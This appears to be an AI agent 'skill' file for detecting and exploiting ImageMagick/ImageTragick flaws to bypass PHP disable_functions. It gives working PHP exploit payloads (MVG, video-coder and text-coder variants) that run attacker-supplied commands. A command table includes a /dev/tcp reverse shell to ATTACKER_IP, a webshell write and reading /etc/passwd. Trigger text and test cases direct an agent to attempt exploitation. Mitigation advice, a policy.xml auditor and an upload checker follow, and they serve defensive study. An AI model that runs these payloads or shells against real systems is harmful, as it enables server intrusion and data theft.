Hacktricks-skills imagick-disable-functions-bypass

Security testing skill for detecting and exploiting ImageMagick/ImageTragick vulnerabilities to bypass PHP disable_functions restrictions. Use this skill whenever the user mentions PHP security testing, disable_functions bypass, ImageMagick vulnerabilities, ImageTragick, CVE-2016-3714, or needs to test for command injection through image processing libraries. Also trigger when users ask about PHP hardening bypass, ImageMagick policy.xml configuration, or security auditing of PHP applications with image upload functionality.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit/SKILL.MD

ImageMagick disable_functions Bypass Testing

A security testing skill for detecting and exploiting ImageMagick/ImageTragick vulnerabilities that allow command execution even when PHP's disable_functions is configured.

Overview

The ImageTragick family of vulnerabilities (CVE-2016-3714 and related) allows attackers to execute arbitrary shell commands through crafted image files when:

  • PHP Imagick extension is installed
  • ImageMagick backend is vulnerable (typically < 7.1.1-11 or 6.x < 6.9.12-73)
  • disable_functions is configured but ImageMagick delegates are not hardened

Important: This skill is for authorized security testing only. Always have written permission before testing.

Detection Workflow

Step 1: Check PHP and Imagick Versions

# Check PHP version
php -r 'echo phpversion(), "\n";'

# Check the Imagick extension version and the ImageMagick library it is linked against
php -r 'echo phpversion("imagick"), "\n";'
php -r 'echo Imagick::getVersion()["versionString"], "\n";'

# Check system ImageMagick version
convert -version | head -1

Step 2: Check Policy Configuration

# Check which coders are enabled/disabled
convert -list policy | grep -iE 'mvg|https|video|text|url|ps'

# If MVG, URL, VIDEO, or TEXT coders are enabled, the system may be vulnerable

Step 3: Check disable_functions Status

<?php
echo "Disable functions: " . ini_get("disable_functions") . "\n";
echo "Imagick available: " . (extension_loaded('imagick') ? 'Yes' : 'No') . "\n";
?>

Exploitation Techniques

Classic ImageTragick (CVE-2016-3714)

Works on Imagick <= 3.3.0 with vulnerable ImageMagick:

<?php
// Classic MVG payload
$cmd = $_GET['cmd'] ?? 'id';
$tmp = tempnam('/tmp', 'pwn');
$mvgs = tempnam('/tmp', 'img');

$payload = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/x.jpg"|$cmd >$tmp")'
pop graphic-context
EOF;

file_put_contents($mvgs, $payload);
$img = new Imagick();
$img->readImage($mvgs);
$img->writeImage(tempnam('/tmp', 'img'));
$img->destroy();

echo file_get_contents($tmp);
?>

Modern Video Coder Variant (2023+)

Works on newer ImageMagick versions with video coder enabled:

<?php
$exp = <<<MAGICK
push graphic-context
image over 0,0 0,0 'vid:dummy.mov" -define video:pixel-format="rgba`uname -a > /tmp/pwned`" " dummy'
pop graphic-context
MAGICK;

$img = new Imagick();
$img->readImageBlob($exp);
?>

Text Coder Variant (CVE-2020-29599)

<?php
$payload = 'text:"foo"`id > /tmp/pwned`"';
$img = new Imagick();
$img->readImageBlob($payload);
?>

Common Test Commands

Use these to verify exploitation works:

| Purpose | Command |
| --- | --- |
| Basic verification | id |
| System enumeration | id; uname -a; cat /etc/passwd |
| File write (webshell) | echo '<?php system($_GET["c"]);' > /var/www/html/shell.php |
| Reverse shell | bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" |
| Check current user | whoami; pwd |

Mitigation Guidance

1. Patch/Upgrade

  • ImageMagick >= 7.1.1-11 (or latest 6.x LTS)
  • Imagick PHP extension >= 3.7.2

2. Harden policy.xml

Edit /etc/ImageMagick-6/policy.xml or /etc/ImageMagick-7/policy.xml:

<policy domain="coder" rights="none" pattern="MVG"/>
<policy domain="coder" rights="none" pattern="MSL"/>
<policy domain="coder" rights="none" pattern="URL"/>
<policy domain="coder" rights="none" pattern="VIDEO"/>
<policy domain="coder" rights="none" pattern="PS"/>
<policy domain="coder" rights="none" pattern="TEXT"/>
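
To confirm that a deployed policy.xml actually denies the coders listed above, the following added example (not part of the original skill) audits a policy document and reports which of the six coders are not set to rights="none". It assumes the last matching coder rule wins, as in ImageMagick's documented deny-all-then-allow pattern; the sample policies and the function names are constructed for illustration.

```python
import fnmatch
import re
import xml.etree.ElementTree as ET

# Coders that the hardening snippet above sets to rights="none".
REQUIRED_DENIED = ["MVG", "MSL", "URL", "VIDEO", "PS", "TEXT"]

def expand_braces(pattern):
    """Expand {A,B} alternation, which policy patterns use for coder lists."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if not m:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    out = []
    for alt in m.group(1).split(","):
        out.extend(expand_braces(head + alt.strip() + tail))
    return out

def coder_rights(policy_xml, coder):
    """Effective rights for a coder, or None when no coder rule matches it.
    Assumption: rules are applied in file order and the last match wins."""
    rights = None
    for pol in ET.fromstring(policy_xml).iter("policy"):
        if pol.get("domain", "").lower() != "coder":
            continue
        globs = expand_braces(pol.get("pattern", ""))
        if any(fnmatch.fnmatchcase(coder.upper(), g.upper()) for g in globs):
            rights = pol.get("rights", "").strip().lower()
    return rights

def audit(policy_xml):
    """Return the required coders that are NOT denied by the policy."""
    return [c for c in REQUIRED_DENIED if coder_rights(policy_xml, c) != "none"]

# Constructed sample policies (not taken from a real host).
WEAK = """<policymap>
  <policy domain="coder" rights="none" pattern="{MVG,MSL}"/>
  <policy domain="coder" rights="read|write" pattern="PS"/>
</policymap>"""

HARDENED = """<policymap>
  <policy domain="coder" rights="none" pattern="*"/>
  <policy domain="coder" rights="read|write" pattern="{PNG,JPEG,GIF}"/>
</policymap>"""

if __name__ == "__main__":
    print("weak policy leaves enabled:", audit(WEAK))
    print("hardened policy leaves enabled:", audit(HARDENED))
```

ImageMagick can load more than one policy.xml from its configuration search path, so run the audit against every policy file on the host and compare the result with the output of convert -list policy.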

3. Remove Imagick Extension

If image processing is not required, remove the extension:

# Debian/Ubuntu
sudo apt-get remove php-imagick

# RHEL/CentOS
sudo yum remove php-imagick

4. Defense in Depth

Never rely solely on disable_functions. Use:

  • Proper input validation
  • File upload restrictions
  • Chroot jails or containers
  • SELinux/AppArmor policies
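
For the input validation and upload restriction items, this added example (not part of the original skill) shows a magic-byte allowlist that rejects uploads such as MVG or text-coder content before they ever reach ImageMagick. The allowed formats, function names and sample inputs are assumptions chosen for illustration.

```python
import os

# Allowlist of formats the application accepts, with their leading signatures.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXT_TO_FORMAT = {".png": "png", ".jpg": "jpeg", ".jpeg": "jpeg", ".gif": "gif"}

def sniff_format(data):
    """Return the allowlisted format whose signature starts the data, else None."""
    for fmt, signatures in ALLOWED.items():
        if any(data.startswith(sig) for sig in signatures):
            return fmt
    return None

def check_upload(filename, data):
    """Return (accepted, detail). On success detail is the detected format,
    which the caller can pass to ImageMagick as an explicit 'fmt:path' prefix
    so the coder is never guessed from attacker-controlled content."""
    fmt = sniff_format(data)
    if fmt is None:
        return (False, "no allowed image signature")
    ext = os.path.splitext(filename)[1].lower()
    if EXT_TO_FORMAT.get(ext) != fmt:
        return (False, "extension does not match detected " + fmt)
    return (True, fmt)

# Constructed sample inputs: a PNG header and a harmless MVG document.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_MVG = b"push graphic-context\nviewbox 0 0 640 480\npop graphic-context\n"

if __name__ == "__main__":
    for name, blob in [("a.png", SAMPLE_PNG), ("a.png", SAMPLE_MVG),
                       ("a.jpg", SAMPLE_PNG), ("a.mvg", SAMPLE_MVG)]:
        print(name, check_upload(name, blob))
```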

Test Cases

Test Case 1: Basic Detection

Prompt: "Check if this PHP server is vulnerable to ImageMagick command injection"

Expected: Run detection workflow, check versions and policy configuration

Test Case 2: Exploitation Test

Prompt: "Test if disable_functions can be bypassed through ImageMagick on this target"

Expected: Attempt exploitation with safe test commands like id or whoami

Test Case 3: Mitigation Review

Prompt: "How do I harden ImageMagick against command injection attacks?"

Expected: Provide policy.xml configuration and upgrade guidance

Security Notice

This skill is for authorized security testing only.

  • Always obtain written permission before testing
  • Use only on systems you own or have explicit authorization to test
  • Document all findings for the system owner
  • Follow responsible disclosure practices